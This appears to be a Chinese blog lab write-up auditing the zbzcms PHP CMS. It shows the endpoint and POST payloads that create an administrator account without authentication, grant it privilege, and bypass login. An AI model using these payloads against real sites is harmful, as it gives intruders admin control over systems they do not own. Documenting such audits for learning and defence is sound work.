zbzcms代码审计实验2

最新推荐文章于 2023-10-16 17:25:10 发布
最新推荐文章于 2023-10-16 17:25:10 发布
阅读量2.8k 收藏 1
点赞数 2
文章标签: 安全 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A1956936030/article/details/121921591
版权

前台未授权添加管理员

一、用seay代码审计系统,自动审计代码,发现可疑代码

在这里插入图片描述

二、查看代码,并分析看看

在这里插入图片描述

发现可疑参数mima和guanliyuan,即密码和管理员,
构造URL

/cms/cms/admin/run_ajax.php?run=admin

构造payload

mima=haha123&guanliyuan=haha

三、使用hackbar插件执行payload

发现返回一个值为5
在这里插入图片描述
尝试用构造的管理员用户和密码登录看看
在这里插入图片描述
发现权限不足无法登录,这里有两种方法解决

第一种

在这里插入图片描述
payload参数加入&dengji=1

mima=haha123&guanliyuan=haha&dengji=1

成功获取权限在这里插入图片描述

第二种

分析代码,分析可以通过其他参数绕过
在这里插入图片描述
构造payload

/cms/cms/admin/run_ajax.php?run=login
guanliyuan=haha$pwd=haha123

执行看看
在这里插入图片描述
刷新发现成功进入后台
在这里插入图片描述

哇哇**
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
开源 免费 java CMS FreeCMS 二次开发文档
06-27
开源 免费 java CMS FreeCMS 二次开发文档
zbzcms代码审计
yzl_007的博客
05-27 1019
zbzcms审计 自己的一个简单记录,可能写的有点混乱,欢迎师傅们指出。 环境搭建 http://127.0.0.1/zbzcms/cms/cms/install/index.php 直接可以自动安装好 正常前台界面 开始 初次学习,就跟着师傅的文章一步步来,正常第一步就seay扫一遍 1、任意文件删除 $run传入,并没有做删除的校验判断 右键全文跟踪 跟到 get传入,up.php 的路径就是:/cms/cms/include/up.php?run=del get请求一下路径: 还是很
代码审计之文件上传漏洞实验
A1956936030的博客
12-08 3378
一、phpstudy搭建zbzcms.com网站 二、使用seay源代码审计工具 1.进行自动审计,发现可疑文件上传的漏洞 2.双击打开,分析代码,添加变量输出$_FILES 添加代码如下:var_dump($_FILES); 3.在网站根目录下新建html文件内容如下 <html> <head> <meta charset="utf-8"> <title>xxx</title> </head> <body> <
php代码审计篇二——ZbzCMS
最新发布
2201_75353421的博客
10-16 161
有段时间没有更新了,这段时间一直在对一些项目重点保护,所以学习有些滞后,但是审代码一直是我比较感兴趣的事,这次也是选择用自己学到的方法结合网上一些已知的漏洞进行审计,希望我的文章也能给想做代审的小伙伴提供思路。
使用zbzcms.com进行代码审计
qq_62673514的博客
01-15 248
使用zbzcms.com进行代码审计
Web自动化测试 —— 测试环境搭建 (Selenium+Python) Windows篇
热门推荐
技在手,能在身,思在脑,从容过生活。
08-06 4万+
2017年6月8日/星期四/阴 (说明:文中提到的网址,在本文完成时都是可以访问的,如果后期不能访问了,可以用文中提到的方法尝试找到新的获取方式) 环境搭建前的准备:   1,到Python官网下载Python安装包:https://www.python.org/   如果不能访问,可以试试下面的解决办法:   a)。安装VPN网络连接工具,推荐用绿色VPN,我用的时候是免费的。   ...
实战中的快速代码审计
Ms08067安全实验室
01-24 1012
文章来源|MS08067 红队培训班 第5期本文作者:山(红队培训班5期学员)目录步骤一 获取源码 1. F12-开发者工具 2. 源码网站 3. 网站找盗版源码 4. 简单粗暴法...
“快看”cms v1.32代码审计
include_voidmain的博客
07-04 1155
CMS代码审计
PHP代码审计 -- 文件上传
qq_46635165的博客
12-15 945
工具&环境 工具:Seay源代码审计系统,文本编辑器一个 环境:phpstudy,网站源码是 zbzcms 步骤 1, 将zbzcms网站源码放入phpstudy,根据网站安装引导完成网站搭建; 2,打开Seay,新建项目 --> 选择网站源码 --> 自动审计,审计完成后点击 漏洞描述对审计结果进行排序,方便结果查看: 3,审计完成,关注存在文件上传这一类,对结果进行观察,一般存在文件上传的地方存在upload,include,up等关键词,然后再看,发现也有文件上传在admin目录
(环境搭建+复现)74CMS模版注入+文件包含getshell
daxi0ng的博客
12-22 3125
0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 0x02 影响版本 骑士 CMS < 6.0.48 0x03 环境搭建 1、下载最新版74cms。 https://www.74cms.com/downlo
实验一 静态代码编码规范审计实验
qq_59611876的博客
04-01 496
DVWA在不同环境下的搭建,代码审计工具RIPS的介绍
内容发布系统NetCMS与Discuz论坛整合源码
08-05
内容发布系统NetCMS与Discuz论坛整合源码 本代码将NetCMS与Discuz!NT3.1进行注册、登录、退出等功能的整合,整合过程如下: 整合环境: 1、NetCMS和Disicuz的架设请参考相关的文档说明,但要注意不要用XP的IIS5.0进行测试,直接用服务器的IIS测试; 2、在VS下直接调试运行NetCMS的登录(user/Logout.aspx)时会出错,最好直接在架设好的环境下测试。 论坛设置: 1、架设好Discuz论坛,打开Discuz论坛系统后台->扩展->通行证设置,通行证的返回地址设置为NetCMS的回调页面地址(此回调页面用于处理CMS的登录退出等功能),如:http://http://netcms.com/api/discuz/apicallback.aspx,此回调页面在源代码的api/discuz/apicallback.aspx下,开发人员可根据需求在这个页面里进行其他的功能处理; 2、打开Discuz论坛系统后台->常规选项->基本设置,找到"身份验证Cookie域"选项,在此填入NetCMS系统的域,如: .netcms.com,注意这项一定要和NetCMS设置里第1条web.config里设置的DNTCookieDomain值一样。 NetCMS设置: 1、在web.config里将<appSettings>配置节里的DNTCookieDomain设置为论坛域,DNTAPIKey,DNTSecert,DNTWebServer修改为在论坛后台扩展设置里获取到的相应值。 2、架设NetCMS,整合就完成了。 整合代码修改说明: 1、引用了DiscuzToolkit插件,用于discuz论坛api接口调用; 2、在API/Discuz目录下添加apicallback.aspx程序页,用于处理论坛回调请求处理; 3、在API/Discuz目录下添加DiscuzSessionHelper.cs,用于实例化论坛API接口; 4、在user/Login.aspx.cs、user/Logout.aspx.cs、user/Register.aspx.cs、user/UserLoginajax.aspx.cs里添加了相应的整合代码; 5、修改了NetCMS源码版本安装初始化数据,首页不能登录和退出等几个bug。
代码审计安全实践
qq_53058639的博客
03-19 313
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。]escape_string()等函数过滤SQL语句,输人一个string类型的参数,为要过滤的命令,返回过滤后的sting类型的命令,过滤后的string类型的命令,过滤的字符为。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
一次代码审计实战案例【思路流程】
qq_53058639的博客
02-15 376
1、一些敏感业务不要轻易放到公网服务器上,放上一定要做好安全。2、在溯源分析时,遇到傀儡机可以考虑下蹭马利用的方式。3、数据库密码哈希值获取,搜寻敏感信息。4、社工查询:谷歌搜索、QQ资料、细心关联分析。网络安全入门学习路线其实入门网络安全要学的东西不算多,也就是网络基础+操作系统+中间件+数据库,四个流程下来就差不多了。1.网络安全法和了解电脑基础其中包括操作系统Windows基础和Linux基础,标记语言HTML基础和代码JS基础,以及网络基础、数据库基础和虚拟机使用等...
cms代码审计练习
黑面狐
04-18 1528
1、letter-post 存在xss漏洞打开写信文件modul/letter/post.phppost 提交进来的数据都经过p8_stripslashes2函数处理跟踪p8_stripslashes2函数lang/inc/init.php可以判断magic_qutes 开启时直接使用p8_stripslashes函数,不开启时直接返回输入的字符继续追踪p8_stripslashes函数删掉反斜杠...
代码安全审计实践
一个梦想(I Have a dream)
01-13 882
代码安全审计实践代码安全审计的内容代码安全审计的工具源码安全检查第三方依赖包安全代码安全审计的落地参考文档 2020年安全相关的事务变多了,也因此更注重安全合规相关的工作了。其中代码安全审计是安全开发生命周期(SDL)中重要的内容,这一年中也正好负责这块的相关工作,这边做个小结。 代码安全审计的内容 代码安全审计的目的通过对源代码进行审查,找出并修复代码中的各种可能影响系统安全的潜在风险,通过提高代码的自身质量,达到降低系统风险的目的。往往由于代码量大,代码安全审计一般会借助静态分析类工具,对代码进行自动检
网站建设技术迈向第三代 CMS系统智能建站成为主流
jiuzyb的专栏
04-22 575
  网站是企业展示自身形象、发布产品信息、联系网上客户的新平台、新天地,进而可以通过电子商务开拓新的市场,以极少的投入获得极大的收益和利润。网站建设,是涵盖企业定位考虑,从营销角度立意而进行一个建设网站的全程完整过程,其中包括了前期网站定位、内容差异化、页面沟通等战略性调研确立后,才着手进行网站风格设计、网站代码制作。传统型的网站建设方式,这个过程需要网站策划人员、美术设计人员、W
CMS中文编码问题分析及解决方案
XOOPS 专栏
11-10 5850
  CMS中文编码问题分析及解决方案开题注: 有意见认为采用UTF-8编码将解决一切语言编码问题。我不同意这种意见: 其一对于中文用户,简体和繁体用户不习惯江两种编码字混排阅读;其二,目前大量网站采用GB/BIG5编码,而MB/ICONV对GB/BIG5 – UTF-8转换的支持并不理想。CMS开发中必须要面对语言问题,主要是指多字节处理,包括encoding charse
CppCMS模板系统
编程资料大全
04-15 249
CppCMS不知不觉已经用了很久了,产品也开发了几个。不过CppCMS的版本一直在演化,1.0已经正式发布,文档也在不断增加和更新。本篇从自己的体会谈谈模板系统(template system). 下面这篇文章系统的介绍了template system。本文部分选取其中的例子,但是从我的角度重新解释。作者的文章有时候不是那么容易理解。 http://cppcms.com/wikipp/en/pag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值